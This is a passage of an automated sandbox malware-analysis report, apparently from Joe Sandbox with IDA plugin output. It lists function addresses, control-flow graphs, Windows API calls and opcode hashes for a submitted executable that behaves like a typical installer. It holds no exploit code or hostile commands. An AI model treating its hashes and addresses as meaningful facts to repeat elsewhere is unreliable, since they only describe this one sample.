                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                • API String ID: 2252812187-1888249752
                                                                                • Opcode ID: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                                • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                                                • Opcode Fuzzy Hash: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                                • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D
                                                                                Function 004502AC Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1610 4502ac-4502b9 1611 4502bf-4502cc GetVersion 1610->1611 1612 450368-450372 1610->1612 1611->1612 1613 4502d2-4502e8 LoadLibraryA 1611->1613 1613->1612 1614 4502ea-450363 GetProcAddress * 6 1613->1614 1614->1612
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmStartSession), ref: 004502F5
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmRegisterResources), ref: 0045030A
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmGetList), ref: 0045031F
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmShutdown), ref: 00450334
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmRestart), ref: 00450349
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmEndSession), ref: 0045035E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadVersion
                                                                                • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                • API String ID: 1968650500-3419246398
                                                                                • Opcode ID: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                                • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                                                • Opcode Fuzzy Hash: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                                • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C
                                                                                Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1674 423c1c-423c50 1675 423c52-423c53 1674->1675 1676 423c84-423c9b call 423b78 1674->1676 1678 423c55-423c71 call 40b44c 1675->1678 1681 423cfc-423d01 1676->1681 1682 423c9d 1676->1682 1699 423c73-423c7b 1678->1699 1700 423c80-423c82 1678->1700 1684 423d03 1681->1684 1685 423d37-423d3c 1681->1685 1686 423ca3-423ca6 1682->1686 1687 423d60-423d70 1682->1687 1688 423fc1-423fc9 1684->1688 1689 423d09-423d11 1684->1689 1692 423d42-423d45 1685->1692 1693 4240aa-4240b8 IsIconic 1685->1693 1690 423cd5-423cd8 1686->1690 1691 423ca8 1686->1691 1694 423d72-423d77 1687->1694 1695 423d7b-423d83 call 4241a4 1687->1695 1704 424162-42416a 1688->1704 1710 423fcf-423fda call 4181f0 1688->1710 1702 423f23-423f4a SendMessageA 1689->1702 1703 423d17-423d1c 1689->1703 1711 423db9-423dc0 1690->1711 1712 423cde-423cdf 1690->1712 1706 423e06-423e16 call 423b94 1691->1706 1707 423cae-423cb1 1691->1707 1708 4240e6-4240fb call 424860 1692->1708 1709 423d4b-423d4c 1692->1709 1693->1704 1705 4240be-4240c9 GetFocus 1693->1705 1697 423d88-423d90 call 4241ec 1694->1697 1698 423d79-423d9c call 423b94 1694->1698 1695->1704 1697->1704 1698->1704 1714 424181-424187 1699->1714 1700->1676 1700->1678 1702->1704 1725 423d22-423d23 1703->1725 1726 42405a-424065 1703->1726 1704->1714 1705->1704 1717 4240cf-4240d8 call 41f004 1705->1717 1706->1704 1718 423cb7-423cba 1707->1718 1719 423e2e-423e4a PostMessageA call 423b94 1707->1719 1708->1704 1728 423d52-423d55 1709->1728 1729 4240fd-424104 1709->1729 1710->1704 1761 423fe0-423fef call 4181f0 IsWindowEnabled 1710->1761 1711->1704 1722 423dc6-423dcd 1711->1722 1723 423ce5-423ce8 1712->1723 1724 423f4f-423f56 1712->1724 1717->1704 1773 4240de-4240e4 SetFocus 1717->1773 1735 423cc0-423cc3 1718->1735 1736 423eb5-423ebc 1718->1736 1719->1704 1722->1704 1741 423dd3-423dd9 1722->1741 1742 423cee-423cf1 1723->1742 1743 423e4f-423e6f call 423b94 1723->1743 1724->1704 1731 423f5c-423f61 call 404e54 1724->1731 1744 424082-42408d 1725->1744 1745 423d29-423d2c 1725->1745 1726->1704 1747 42406b-42407d 1726->1747 1748 424130-424137 1728->1748 1749 423d5b 1728->1749 1738 424106-424119 call 4244e4 1729->1738 1739 42411b-42412e call 42453c 1729->1739 1731->1704 1756 423cc9-423cca 1735->1756 1757 423dde-423dec IsIconic 1735->1757 1758 423ebe-423ed1 call 423b24 1736->1758 1759 423eef-423f00 call 423b94 1736->1759 1738->1704 1739->1704 1741->1704 1762 423cf7 1742->1762 1763 423e1b-423e29 call 424188 1742->1763 1788 423e93-423eb0 call 423a94 PostMessageA 1743->1788 1789 423e71-423e8e call 423b24 PostMessageA 1743->1789 1744->1704 1750 424093-4240a5 1744->1750 1767 423d32 1745->1767 1768 423f66-423f6e 1745->1768 1747->1704 1765 42414a-424159 1748->1765 1766 424139-424148 1748->1766 1769 42415b-42415c call 423b94 1749->1769 1750->1704 1774 423cd0 1756->1774 1775 423da1-423da9 1756->1775 1781 423dfa-423e01 call 423b94 1757->1781 1782 423dee-423df5 call 423bd0 1757->1782 1803 423ee3-423eea call 423b94 1758->1803 1804 423ed3-423edd call 41ef68 1758->1804 1808 423f02-423f08 call 41eeb4 1759->1808 1809 423f16-423f1e call 423a94 1759->1809 1761->1704 1805 423ff5-424004 call 4181f0 IsWindowVisible 1761->1805 1762->1769 1763->1704 1765->1704 1766->1704 1767->1769 1768->1704 1772 423f74-423f7b 1768->1772 1797 424161 1769->1797 1772->1704 1790 423f81-423f90 call 4181f0 IsWindowEnabled 1772->1790 1773->1704 1774->1769 1775->1704 1791 423daf-423db4 call 422c5c 1775->1791 1781->1704 1782->1704 1788->1704 1789->1704 1790->1704 1819 423f96-423fac call 412320 1790->1819 1791->1704 1797->1704 1803->1704 1804->1803 1805->1704 1826 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1805->1826 1823 423f0d-423f10 1808->1823 1809->1704 1819->1704 1829 423fb2-423fbc 1819->1829 1823->1809 1826->1704 1829->1704
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                                • Instruction ID: adb1057a9d0d7329e5210459a6b6756db00cf693e958207d3a560887342e2c6b
                                                                                • Opcode Fuzzy Hash: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                                • Instruction Fuzzy Hash: EBE1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE81DB08
                                                                                Function 00467710 Relevance: 15.6, APIs: 4, Strings: 4, Instructions: 1649windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1989 467710-467726 1990 467730-4677e7 call 49514c call 402b30 * 6 1989->1990 1991 467728-46772b call 402d30 1989->1991 2008 467824-46783d 1990->2008 2009 4677e9-467810 call 41464c 1990->2009 1991->1990 2015 46783f-467866 call 41462c 2008->2015 2016 46787a-467888 call 495454 2008->2016 2013 467815-46781f call 41460c 2009->2013 2014 467812 2009->2014 2013->2008 2014->2013 2022 46786b-467875 call 4145ec 2015->2022 2023 467868 2015->2023 2024 46788a-467899 call 49529c 2016->2024 2025 46789b-46789d call 4953c0 2016->2025 2022->2016 2023->2022 2030 4678a2-4678f5 call 494db0 call 41a3e0 * 2 2024->2030 2025->2030 2037 467906-46791b call 451444 call 414b28 2030->2037 2038 4678f7-467904 call 414b28 2030->2038 2043 467920-467927 2037->2043 2038->2043 2045 46796f-467df5 call 4951ec call 495510 call 41462c * 3 call 4146cc call 4145ec * 3 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f80 call 460fd4 LoadBitmapA call 41d6c0 call 460fa4 call 460fbc call 4674ec call 469000 call 466b6c call 40357c call 414b28 call 466ea4 call 466eac call 466b6c call 40357c * 2 call 414b28 call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 414b28 * 2 call 469000 call 414b28 * 2 call 466ea4 call 41460c call 466ea4 call 41460c call 469000 call 414b28 call 466ea4 call 466eac call 469000 call 414b28 call 466ea4 call 41460c * 2 call 414b28 call 466ea4 call 41460c 2043->2045 2046 467929-46796a call 4146cc call 414710 call 420fa8 call 420fd4 call 420b78 call 420ba4 2043->2046 2176 467df7-467e4f call 41460c call 414b28 call 466ea4 call 41460c 2045->2176 2177 467e51-467e6a call 414a54 * 2 2045->2177 2046->2045 2185 467e6f-467f20 call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2176->2185 2177->2185 2203 467f22-467f3d 2185->2203 2204 467f5a-468190 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 4181f0 call 42ed48 call 414b28 call 4951ec call 495510 call 41462c call 466b6c call 414b28 call 466ea4 call 41460c call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 41460c call 466eac call 466b6c call 414b28 call 466ea4 2185->2204 2205 467f42-467f55 call 41460c 2203->2205 2206 467f3f 2203->2206 2265 468192-46819b 2204->2265 2266 4681d1-46828a call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2204->2266 2205->2204 2206->2205 2265->2266 2267 46819d-4681cc call 414a54 call 466eac 2265->2267 2284 4682c4-4686e5 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 414b28 call 4951ec call 495510 call 41462c call 414b28 call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 42bbe0 call 495520 call 44e8c0 call 466b6c call 469000 call 466b6c call 469000 call 466b6c call 469000 * 2 call 414b28 call 466ea4 call 466eac call 469000 call 494db0 call 41a3e0 call 466b6c call 40357c call 414b28 call 466ea4 call 41460c call 414b28 * 2 call 495520 call 403494 call 40357c * 2 call 414b28 2266->2284 2285 46828c-4682a7 2266->2285 2267->2266 2384 4686e7-468704 call 44ffc8 call 450124 2284->2384 2385 468709-468710 2284->2385 2287 4682ac-4682bf call 41460c 2285->2287 2288 4682a9 2285->2288 2287->2284 2288->2287 2384->2385 2387 468734-46873b 2385->2387 2388 468712-46872f call 44ffc8 call 450124 2385->2388 2391 46875f-4687a5 call 4181f0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4690f4 2387->2391 2392 46873d-46875a call 44ffc8 call 450124 2387->2392 2388->2387 2405 4687a7-4687ae 2391->2405 2406 4687bf 2391->2406 2392->2391 2407 4687b0-4687b9 2405->2407 2408 4687bb-4687bd 2405->2408 2409 4687c1-4687d0 2406->2409 2407->2406 2407->2408 2408->2409 2410 4687d2-4687d9 2409->2410 2411 4687ea 2409->2411 2413 4687e6-4687e8 2410->2413 2414 4687db-4687e4 2410->2414 2412 4687ec-468806 2411->2412 2415 4688af-4688b6 2412->2415 2416 46880c-468815 2412->2416 2413->2412 2414->2411 2414->2413 2419 4688bc-4688df call 47bfd8 call 403450 2415->2419 2420 468949-468957 call 414b28 2415->2420 2417 468817-46886e call 47bfd8 call 414b28 call 47bfd8 call 414b28 call 47bfd8 call 414b28 2416->2417 2418 468870-4688aa call 414b28 * 3 2416->2418 2417->2415 2418->2415 2443 4688f0-468904 call 403494 2419->2443 2444 4688e1-4688ee call 47c178 2419->2444 2428 46895c-468965 2420->2428 2432 468a75-468aa4 call 42b97c call 44e84c 2428->2432 2433 46896b-468983 call 429fe8 2428->2433 2462 468b52-468b56 2432->2462 2463 468aaa-468aae 2432->2463 2445 468985-468989 2433->2445 2446 4689fa-4689fe 2433->2446 2458 468916-468947 call 42c814 call 42cbd0 call 403494 call 414b28 2443->2458 2459 468906-468911 call 403494 2443->2459 2444->2458 2454 46898b-4689c5 call 40b44c call 47bfd8 2445->2454 2452 468a00-468a09 2446->2452 2453 468a4e-468a52 2446->2453 2452->2453 2460 468a0b-468a16 2452->2460 2465 468a66-468a70 call 42a06c 2453->2465 2466 468a54-468a64 call 42a06c 2453->2466 2519 4689c7-4689ce 2454->2519 2520 4689f4-4689f8 2454->2520 2458->2428 2459->2458 2460->2453 2470 468a18-468a1c 2460->2470 2473 468bd5-468bd9 2462->2473 2474 468b58-468b5f 2462->2474 2472 468ab0-468ac2 call 40b44c 2463->2472 2465->2432 2466->2432 2478 468a1e-468a41 call 40b44c call 406acc 2470->2478 2497 468af4-468b2b call 47bfd8 call 44cb1c 2472->2497 2498 468ac4-468af2 call 47bfd8 call 44cbec 2472->2498 2481 468c42-468c4b 2473->2481 2482 468bdb-468bf2 call 40b44c 2473->2482 2474->2473 2483 468b61-468b68 2474->2483 2529 468a43-468a46 2478->2529 2530 468a48-468a4c 2478->2530 2490 468c4d-468c65 call 40b44c call 469d68 2481->2490 2491 468c6a-468c7f call 46724c call 466fc8 2481->2491 2511 468bf4-468c30 call 40b44c call 469d68 * 2 call 469c08 2482->2511 2512 468c32-468c40 call 469d68 2482->2512 2483->2473 2493 468b6a-468b75 2483->2493 2490->2491 2538 468cd1-468cdb call 414a54 2491->2538 2539 468c81-468ca4 call 42a050 call 40b44c 2491->2539 2493->2491 2501 468b7b-468b7f 2493->2501 2540 468b30-468b34 2497->2540 2498->2540 2513 468b81-468b97 call 40b44c 2501->2513 2511->2491 2512->2491 2536 468bca-468bce 2513->2536 2537 468b99-468bc5 call 42a06c call 469d68 call 469c08 2513->2537 2519->2520 2531 4689d0-4689e2 call 406acc 2519->2531 2520->2446 2520->2454 2529->2453 2530->2453 2530->2478 2531->2520 2557 4689e4-4689ee 2531->2557 2536->2513 2550 468bd0 2536->2550 2537->2491 2552 468ce0-468cff call 414a54 2538->2552 2571 468ca6-468cad 2539->2571 2572 468caf-468cbe call 414a54 2539->2572 2548 468b36-468b3d 2540->2548 2549 468b3f-468b41 2540->2549 2548->2549 2556 468b48-468b4c 2548->2556 2549->2556 2550->2491 2567 468d01-468d24 call 42a050 call 469ec8 2552->2567 2568 468d29-468d4c call 47bfd8 call 403450 2552->2568 2556->2462 2556->2472 2557->2520 2562 4689f0 2557->2562 2562->2520 2567->2568 2586 468d4e-468d57 2568->2586 2587 468d68-468d71 2568->2587 2571->2572 2576 468cc0-468ccf call 414a54 2571->2576 2572->2552 2576->2552 2586->2587 2590 468d59-468d66 call 47c178 2586->2590 2588 468d87-468d97 call 403494 2587->2588 2589 468d73-468d85 call 403684 2587->2589 2597 468da9-468dc0 call 414b28 2588->2597 2589->2588 2598 468d99-468da4 call 403494 2589->2598 2590->2597 2602 468df6-468e00 call 414a54 2597->2602 2603 468dc2-468dc9 2597->2603 2598->2597 2608 468e05-468e2a call 403400 * 3 2602->2608 2605 468dd6-468de0 call 42b0f4 2603->2605 2606 468dcb-468dd4 2603->2606 2609 468de5-468df4 call 414a54 2605->2609 2606->2605 2606->2609 2609->2608
                                                                                APIs
                                                                                  • Part of subcall function 0049529C: GetWindowRect.USER32(00000000), ref: 004952B2
                                                                                • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467ADF
                                                                                  • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467AF9), ref: 0041D6EB
                                                                                  • Part of subcall function 004674EC: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                  • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                  • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                  • Part of subcall function 00466EAC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                                  • Part of subcall function 00495520: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0049552A
                                                                                  • Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                  • Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                  • Part of subcall function 004951EC: 73E9A570.USER32(00000000,?,?,?), ref: 0049520E
                                                                                  • Part of subcall function 004951EC: SelectObject.GDI32(?,00000000), ref: 00495234
                                                                                  • Part of subcall function 004951EC: 73E9A480.USER32(00000000,?,00495292,0049528B,?,00000000,?,?,?), ref: 00495285
                                                                                  • Part of subcall function 00495510: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0049551A
                                                                                • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02169D90,0216B97C,?,?,0216B9AC,?,?,0216B9FC,?), ref: 00468769
                                                                                • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046877A
                                                                                • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468792
                                                                                  • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                • String ID: $(Default)$STOPIMAGE$k H
                                                                                • API String ID: 3271511185-4041106330
                                                                                • Opcode ID: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                                • Instruction ID: 2b4e5e33b1fbe28ecfb2af168a793b611adbc31a6fcb8730d9662ddd01b2079a
                                                                                • Opcode Fuzzy Hash: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                                • Instruction Fuzzy Hash: 6CF2C7386005208FCB00EB59D9D9F9973F5BF49304F1582BAF5049B36ADB74AC46CB9A
                                                                                Function 004751F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                                                • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID: unins$unins???.*
                                                                                • API String ID: 3541575487-1009660736
                                                                                • Opcode ID: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                                • Instruction ID: 9ba6e551af2be01ae54f2bf6d4feb37662207b66b60327addd096aea054bc42d
                                                                                • Opcode Fuzzy Hash: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                                • Instruction Fuzzy Hash: 333153706005489FDB10EB65D981ADE77B9EF44344F5080F6A80CAB3B2DBB89F418B58
                                                                                Function 00452A4C Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileFindFirstLast
                                                                                • String ID:
                                                                                • API String ID: 873889042-0
                                                                                • Opcode ID: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                                • Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
                                                                                • Opcode Fuzzy Hash: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                                • Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
                                                                                Function 0046E38C Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,0046E422), ref: 0046E396
                                                                                • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E422), ref: 0046E3B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstanceVersion
                                                                                • String ID:
                                                                                • API String ID: 1462612201-0
                                                                                • Opcode ID: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                                • Instruction ID: ca204bcfc643a6eeda20b237376823326e775e7ff9cf44b6f5c5a065e078b710
                                                                                • Opcode Fuzzy Hash: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                                • Instruction Fuzzy Hash: 80F0A035282200DEEB1097AADC45B4A37C1BB20718F40007BF440D7391E3FDD8908A5F
                                                                                Function 00408570 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                Function 00423B94 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
